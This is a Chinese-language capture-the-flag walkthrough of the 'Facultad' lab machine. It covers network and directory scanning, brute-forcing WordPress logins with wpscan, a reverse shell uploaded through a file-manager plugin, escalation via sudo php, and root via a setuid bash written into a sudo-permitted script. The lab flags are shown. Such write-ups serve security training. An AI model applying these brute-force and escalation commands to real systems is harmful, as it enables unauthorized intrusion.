TheHackersLabs-Facultad-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.205  08:00:27:6d:99:86       (Unknown)
192.168.60.254  00:50:56:e5:e5:eb       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.949 seconds (131.35 hosts/sec). 4 responded
❯ export ip=192.168.60.205
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.205:22
Open 192.168.60.205:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 08:40 CST
Initiating ARP Ping Scan at 08:40
Scanning 192.168.60.205 [1 port]
Completed ARP Ping Scan at 08:40, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:40
Completed Parallel DNS resolution of 1 host. at 08:40, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:40
Scanning 192.168.60.205 [2 ports]
Discovered open port 22/tcp on 192.168.60.205
Discovered open port 80/tcp on 192.168.60.205
Completed SYN Stealth Scan at 08:40, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.205
Host is up, received arp-response (0.00045s latency).
Scanned at 2025-02-25 08:40:40 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:6D:99:86 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

得到/education发现是个wordpress站点

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.205
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 4651]
/images               (Status: 301) [Size: 317] [--> http://192.168.60.205/images/]
/education            (Status: 301) [Size: 320] [--> http://192.168.60.205/education/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

浏览器访问一下，编辑hosts

添加域名facultad.thl

WPscan

那就利用wpscan扫一下，爆破后

得到登录凭证facultad:asdfghjkl

❯ wpscan --url http://facultad.thl/education -e u facultad -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://facultad.thl/education/ [192.168.60.205]
[+] Started: Tue Feb 25 08:55:42 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.62 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://facultad.thl/education/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://facultad.thl/education/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://facultad.thl/education/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Outdated, released on 2024-11-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://facultad.thl/education/?feed=rss2, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://facultad.thl/education/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.7.1</generator>

[+] WordPress theme in use: twentytwentyfive
 | Location: http://facultad.thl/education/wp-content/themes/twentytwentyfive/
 | Last Updated: 2025-02-11T00:00:00.000Z
 | Readme: http://facultad.thl/education/wp-content/themes/twentytwentyfive/readme.txt
 | [!] The version is out of date, the latest version is 1.1
 | [!] Directory listing is enabled
 | Style URL: http://facultad.thl/education/wp-content/themes/twentytwentyfive/style.css?ver=1.0
 | Style Name: Twenty Twenty-Five
 | Style URI: https://wordpress.org/themes/twentytwentyfive/
 | Description: Twenty Twenty-Five emphasizes simplicity and adaptability. It offers flexible design options, suppor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://facultad.thl/education/wp-content/themes/twentytwentyfive/style.css?ver=1.0, Match: 'Version: 1.0'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] Facultad
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] facultad
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - Facultad / asdfghjkl
[SUCCESS] - facultad / asdfghjkl
Trying facultad / minnie Time: 00:00:09 <                                                                     > (816 / 28689599)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: Facultad, Password: asdfghjkl
 | Username: facultad, Password: asdfghjkl

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Feb 25 08:55:55 2025
[+] Requests Done: 832
[+] Cached Requests: 46
[+] Data Sent: 447.884 KB
[+] Data Received: 511.744 KB
[+] Memory used: 208.945 MB
[+] Elapsed time: 00:00:12

尝试上传恶意插件，拿到webshell

发现我们对wordpress插件目录没有写权限⁉️

不过有个自带的插件WP File Manager，在education目录下有写权限

尝试传个反弹shell

用户提权

监听一下端口

得到debian gabri vivian用户

❯ pwncat-cs -lp 4444
[09:35:12] Welcome to pwncat 🐈!                           __main__.py:164
[09:36:05] received connection from 192.168.60.205:44260        bind.py:84
[09:36:05] 0.0.0.0:4444: upgrading from /usr/bin/dash to    manager.py:957
           /usr/bin/bash
[09:36:24] 192.168.60.205:44260: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) [email protected]:/home/vivian$ cat /etc/passwd |grep -P '/bin/sh|bash'
root:x:0:0:root:/root:/bin/bash
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
gabri:x:1001:1001::/home/gabri:/bin/sh
vivian:x:1002:1002::/home/vivian:/bin/sh

不过home目录下vivian可以直接读flag

(remote) [email protected]:/home/vivian$ cat user.txt
mcxvbniou345897hjbhjzx

www-data有sudo权限可以执行php

直接提权到gabri用户

(remote) [email protected]:/home$ sudo -l
sudo: unable to resolve host TheHackersLabs-facultad.thl: Name or service not known
Matching Defaults entries for www-data on TheHackersLabs-facultad:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on TheHackersLabs-facultad:
    (gabri) NOPASSWD: /usr/bin/php
(remote) [email protected]:/home$ sudo -u gabri /usr/bin/php -r "system('/bin/bash');"
sudo: unable to resolve host TheHackersLabs-facultad.thl: Name or service not known
gabri@TheHackersLabs-facultad:/home$

在用户邮箱中发现有个隐藏文件，是vivian的备份密码

gabri@TheHackersLabs-facultad:/home$ cat /var/mail/gabri/.password_vivian.bf
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++.-----------.+++++++++++++++.---------------.+++++++++++++++++++.--.---.-.-------------.<<++++++++++++++++++++.--.++.+++.

明显就是Brainfuck加密，解密得到lapatrona2025

Root提权

切换一下用户上去

我还以为切换上去就卡住了，原来这个用户的默认shell是sh

gabri@TheHackersLabs-facultad:/tmp$ su vivian
Password:
id
uid=1002(vivian) gid=1002(vivian) grupos=1002(vivian)
bash
vivian@TheHackersLabs-facultad:/tmp$ sudo -l
sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido
Matching Defaults entries for vivian on TheHackersLabs-facultad:
vivian@TheHackersLabs-facultad:/tmp$     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User vivian may run the following commands on TheHackersLabs-facultad:
    (ALL) NOPASSWD: /opt/vivian/script.sh

同时在crontab中发现有个定时任务

gabri@TheHackersLabs-facultad:/opt/vivian$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6    * * 7   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6    1 * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
* * * * * /opt/vivian/script.sh

上传pspy64监测一下系统进程

UID1002定期执行

2025/02/25 03:19:01 CMD: UID=1002  PID=14161  | /bin/sh -c /opt/vivian/script.sh && sleep 10 && /opt/vivian/script.sh && sleep 10 && /opt/vivian/script.sh && sleep 10
------------------------------------------
gabri@TheHackersLabs-facultad:/tmp$ id 1002
uid=1002(vivian) gid=1002(vivian) groups=1002(vivian)

看一下脚本

gabri@TheHackersLabs-facultad:/tmp$ ls -al /opt/vivian/script.sh
-rwxr-xr-x 1 vivian vivian 58 Jan 27 22:34 /opt/vivian/script.sh
gabri@TheHackersLabs-facultad:/tmp$ cat /opt/vivian/script.sh
#!/bin/bash
echo "Ejecutado como vivian para mis alumnos"
执行为我的学生而活着

直接改了就完事了

vivian@TheHackersLabs-facultad:/$ cd /opt/
vivian@TheHackersLabs-facultad:/opt$ cd vivian/
vivian@TheHackersLabs-facultad:/opt/vivian$ echo "chmod +s /bin/bash">script.sh
vivian@TheHackersLabs-facultad:/opt/vivian$ cat script.sh
chmod +s /bin/bash
vivian@TheHackersLabs-facultad:/opt/vivian$ sudo /opt/vivian/script.sh
sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido
vivian@TheHackersLabs-facultad:/opt/vivian$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 mar 29  2024 /bin/bash
vivian@TheHackersLabs-facultad:/opt/vivian$ bash -p
vivian@TheHackersLabs-facultad:/opt/vivian# whoami
root
vivian@TheHackersLabs-facultad:/opt/vivian# cat /root/root.txt
vivian@TheHackersLabs-facultad:/opt/vivian# nbfgjyui4r57834sdbhjcvhz